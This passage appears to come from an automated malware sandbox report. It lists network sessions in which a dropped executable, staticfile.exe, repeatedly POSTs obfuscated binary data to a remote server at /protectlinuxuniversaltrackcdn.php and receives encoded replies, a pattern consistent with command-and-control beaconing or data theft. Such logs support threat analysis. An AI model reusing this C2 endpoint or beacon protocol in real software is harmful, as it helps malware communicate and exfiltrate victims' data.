                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:38:24.748203039 CET2544OUTData Raw: 55 50 59 5c 55 5b 50 59 55 5c 57 59 50 5a 5a 53 58 5f 5b 52 51 5e 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UPY\U[PYU\WYPZZSX_[RQ^S\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D<X67?&> \,,+&+4$-?X(6$ =0=?Z1%.4._/%^/$
                                        Nov 30, 2024 22:38:25.808310032 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:26.042562008 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        110192.168.2.450109213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:26.290427923 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:26.638863087 CET2544OUTData Raw: 50 59 5c 5e 55 5a 55 5d 55 5c 57 59 50 53 5a 55 58 5f 5b 5e 51 59 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PY\^UZU]U\WYPSZUX_[^QYSYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!E<#T+%<\8 &;(U3[;Y(%;#2$?1#-$._/%^/
                                        Nov 30, 2024 22:38:27.674778938 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:27.910437107 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        111192.168.2.450113213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:28.151048899 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:28.498194933 CET2544OUTData Raw: 50 5e 59 5b 50 59 50 59 55 5c 57 59 50 5a 5a 56 58 58 5b 53 51 51 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^Y[PYPYU\WYPZZVXX[SQQS[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"<_ 2$%-?/42]+$[<=5#4?1R&=,&3.$._/%^/$


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        112192.168.2.450114213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:28.961883068 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1404
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:29.310678005 CET1404OUTData Raw: 55 58 59 5c 55 5c 55 5c 55 5c 57 59 50 52 5a 55 58 5c 5b 58 51 59 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UXY\U\U\U\WYPRZUX\[XQYSUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(=1#14^%- Z-< 18(T3=/)C/X ,1R']26Y.4._/%^/
                                        Nov 30, 2024 22:38:30.403708935 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:30.638546944 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 16 3c 38 39 05 3f 5e 3e 04 39 3f 38 13 25 01 3d 5e 2f 2e 2d 5e 2b 2a 39 13 2a 12 32 0a 22 5e 2b 5c 3c 5f 3e 52 26 36 0f 05 28 11 2b 5e 0c 1b 23 1b 28 02 32 00 24 2b 37 05 27 1e 01 02 22 21 20 00 33 03 25 0e 3c 01 39 04 22 22 26 54 2c 0b 22 0a 32 3a 33 01 3e 3c 3c 0e 21 29 2f 56 0b 12 22 1b 24 32 39 13 25 06 38 11 20 0e 03 05 23 26 36 10 23 01 21 10 22 01 2e 58 2b 3d 2d 06 23 20 23 0b 3d 2d 3d 10 26 32 3f 50 29 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #<89?^>9?8%=^/.-^+*9*2"^+\<_>R&6(+^#(2$+7'"! 3%<9""&T,"2:3><<!)/V"$29%8 #&6#!".X+=-# #=-=&2?P)=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        113192.168.2.450115213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:29.088288069 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:29.435698986 CET2544OUTData Raw: 50 5b 59 5b 55 5f 50 5e 55 5c 57 59 50 5e 5a 50 58 5f 5b 5c 51 5c 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P[Y[U_P^U\WYP^ZPX_[\Q\S]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!E+>4!#%.$];/R2;+$7)5# =$>?13._-$._/%^/4
                                        Nov 30, 2024 22:38:30.414098978 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:30.646581888 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        114192.168.2.450116213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:30.883181095 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:38:31.232891083 CET2544OUTData Raw: 55 5a 5c 5e 55 58 55 5d 55 5c 57 59 50 5f 5a 51 58 59 5b 5b 51 5d 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UZ\^UXU]U\WYP_ZQXY[[Q]SUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(>"#2?1,Z8,(%84$.8>+ >3,2,4._/%^/0
                                        Nov 30, 2024 22:38:32.273438931 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:32.506448030 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        115192.168.2.450117213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:32.748279095 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:33.110779047 CET2544OUTData Raw: 55 51 5c 5a 55 55 50 50 55 5c 57 59 50 5f 5a 55 58 5c 5b 5f 51 5f 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UQ\ZUUPPU\WYP_ZUX\[_Q_SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!C<=%41?1$],Z32'=?=%<#*'.+_$#,$._/%^/0
                                        Nov 30, 2024 22:38:34.213676929 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:34.459898949 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:33 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        116192.168.2.450118213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:34.697127104 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:35.045105934 CET2544OUTData Raw: 50 5c 5c 58 55 5a 55 5d 55 5c 57 59 50 53 5a 54 58 58 5b 5d 51 5a 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\\XUZU]U\WYPSZTXX[]QZSTU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"<&\4'&#/<428'3(=58#9S0[(&).._/%^/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        117192.168.2.450119213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:35.775911093 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:36.123384953 CET1428OUTData Raw: 55 5c 59 5a 55 58 55 5c 55 5c 57 59 50 52 5a 5c 58 5f 5b 53 51 50 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\YZUXU\U\WYPRZ\X_[SQPS]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!?-:77%>-<7W&]<U0#[)+[ ,9R3=&U9-$._/%^/
                                        Nov 30, 2024 22:38:37.096735001 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:37.330565929 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 06 28 28 35 00 2b 38 25 5c 39 3c 23 0d 26 06 26 06 2c 04 3a 00 3f 39 35 11 3d 02 21 57 21 28 27 5b 2b 3a 21 0c 33 35 2d 04 28 11 2b 5e 0c 1b 23 1c 28 3b 07 5d 33 05 2f 06 33 1e 0d 00 20 21 20 03 27 3e 25 0d 3f 5e 3e 58 34 57 2e 17 38 0c 3e 0e 25 17 02 1c 2b 3f 2f 11 22 29 2f 56 0b 12 22 57 33 0c 04 02 24 2c 30 59 37 30 22 5c 35 40 29 03 21 2c 39 56 23 3b 3a 59 29 3e 32 12 20 23 24 50 29 03 21 5b 26 0c 3f 55 29 17 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: ((5+8%\9<#&&,:?95=!W!('[+:!35-(+^#(;]3/3 ! '>%?^>X4W.8>%+?/")/V"W3$,0Y70"\5@)!,9V#;:Y)>2 #$P)![&?U)/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        118192.168.2.450120213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:35.903141022 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:36.248379946 CET2544OUTData Raw: 55 5c 59 5f 55 55 50 51 55 5c 57 59 50 5f 5a 56 58 5f 5b 5e 51 51 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\Y_UUPQU\WYP_ZVX_[^QQS]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(>_!!4X%>;,+W$( T0=+X>C'[ >&>?\23._.._/%^/0
                                        Nov 30, 2024 22:38:37.353579044 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:37.599809885 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:37 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        119192.168.2.450121213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:37.839813948 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:38:38.186100960 CET2544OUTData Raw: 55 51 59 5c 55 5e 50 5d 55 5c 57 59 50 58 5a 53 58 5c 5b 5f 51 51 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UQY\U^P]U\WYPXZSX\[_QQSYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!*.*X728\%=8\-<28$V'=549T3>;]2)9._/%^/,
                                        Nov 30, 2024 22:38:39.164870024 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:39.398659945 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        120192.168.2.450122213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:39.649108887 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:39.998255968 CET2544OUTData Raw: 55 5e 5c 5e 55 5c 50 5f 55 5c 57 59 50 52 5a 52 58 59 5b 5b 51 5a 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U^\^U\P_U\WYPRZRXY[[QZSTU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(*#!;&.8_/<T20V'.4*'Z %&>$13!-._/%^/
                                        Nov 30, 2024 22:38:40.995573997 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:41.230694056 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:40 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        121192.168.2.450123213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:41.478455067 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:41.826523066 CET2544OUTData Raw: 55 5a 5c 5f 55 55 55 58 55 5c 57 59 50 53 5a 53 58 59 5b 5f 51 5b 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UZ\_UUUXU\WYPSZSXY[_Q[S^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(.!4_1.^801+')72'8& 59$._/%^/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        122192.168.2.450124213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:42.463165045 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:42.812812090 CET1428OUTData Raw: 55 5c 5c 58 50 59 50 51 55 5c 57 59 50 5a 5a 53 58 54 5b 5e 51 5d 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\\XPYPQU\WYPZZSXT[^Q]S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!@(=&_#%-8^-,+V$+#$ (%;Z"/-T&-;%3*[.._/%^/$
                                        Nov 30, 2024 22:38:43.778281927 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:44.279607058 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:43 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 14 3f 01 31 00 28 3b 3d 1e 3a 3c 2f 0c 32 16 31 10 3b 3e 31 5c 2b 03 3e 03 3d 3c 3e 0e 21 28 28 04 3c 39 3e 53 26 26 2a 5c 28 3b 2b 5e 0c 1b 20 40 28 02 31 5e 24 15 0a 5d 30 0e 3f 02 22 32 3b 5b 27 5b 3a 1c 3c 16 07 00 22 31 25 09 2d 22 25 54 26 00 38 5e 3e 3c 23 56 21 03 2f 56 0b 12 21 08 33 32 21 5f 26 11 30 1f 20 09 2e 5e 35 08 00 11 23 3c 36 0a 21 28 26 11 28 00 3a 5b 20 0d 33 0b 2a 2d 0b 10 24 22 37 19 3d 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #?1(;=:</21;>1\+>=<>!((<9>S&&*\(;+^ @(1^$]0?"2;['[:<"1%-"%T&8^><#V!/V!32!_&0 .^5#<6!(&(:[ 3*-$"7==/P/"V1]M
                                        Nov 30, 2024 22:38:44.387223959 CET380INHTTP/1.1 200 OK
